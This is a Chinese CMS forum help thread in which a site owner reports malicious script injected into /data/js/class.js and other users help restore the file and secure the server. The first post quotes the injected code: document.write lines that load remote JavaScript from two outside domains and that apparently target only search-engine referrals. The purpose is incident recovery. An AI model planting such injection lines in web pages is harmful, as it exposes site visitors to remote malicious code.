帝国论坛 → 帝国软件产品与服务 → 帝国下载系统 → [求助]网站被人挂马 【本版专题贴子】

主题：[求助]网站被人挂马 [加入收藏夹]

qq51326 用户头衔：秀才 精华贴   ：0 发贴数   ：121 经验值   ：505 注册时间：2009-01-28	信息 搜索 好友 发送悄悄话 【精益求精－帝国网站管理系统7.5正式版开源发布】   [第 1 楼]
	[求助]网站被人挂马 网站被人挂马，被挂马的文件为：/data/js/class.js 主要毒代码为： document.write('<script language="javascript" type="text/javascript" src="http://b.ycfufeng.cn/tj.js"></script>'); document.write('<script language="javascript" type="text/javascript" src="http://www.senyiyy.com/he/tj.js"></script>'); /data/js/class.js好像是更新网站某一地方就会自动更新，现在我选择更新全站，“/data/js/class.js”文件也不更新，“/data/js/”下的文件也不更新，如何让“/data/js/”目录下的所有文件都更新？
	2016-03-28 23:45:53 已设置保密 顶部 回复 引用 报告 编辑 删除

零距离 用户头衔：探花 精华贴   ：0 发贴数   ：4834 经验值   ：12848 注册时间：2007-12-26	信息 搜索 好友 发送悄悄话 【免费开源－EBMA系统：更安全的MYSQL管理和备份系统】   [第 2 楼]
	删除掉这个文件，然后登录后台管理分类，修改某一个分类名称，然后再改回来就会重新生成了 文件被批量改的？估计有服务器权限了，检查服务器安全和ftp密码别搞太弱
	2016-03-29 08:02:09 已设置保密 顶部 回复 引用 报告 编辑 删除

qq51326 用户头衔：秀才 精华贴   ：0 发贴数   ：121 经验值   ：505 注册时间：2009-01-28	信息 搜索 好友 发送悄悄话 【精益求精－帝国网站管理系统7.5正式版开源发布】   [第 3 楼]
	谢谢大侠指点。网站已经恢复正常。 经查毒代码是加在/data/js/class.js文件上的，这个文件好像是分类栏目的，每个页面都会调入分类栏目，同时毒代码也一同被加载，这个毒代码只是对来路为百度、谷歌、360等搜索执行毒动作，直接打开是不执行毒动作的。 不能更新/data/js/class.js的原因是我给所有的文件夹都禁止写入了，允许写入就能更新了。
	2016-03-30 01:52:21 已设置保密 顶部 回复 引用 报告 编辑 删除

快速回复
内容 表情	使用EBB代码 使用smile代码 显示签名 自动分析url 自动分析img
	【进入高级模式】   (按 Ctrl+Enter 直接提交)

顶部  加入收藏夹

关于帝国 | 广告服务 | 联系我们 | 法律声明 | 隐私条款 | 许可协议

Powered by： EBB Version 2.2.1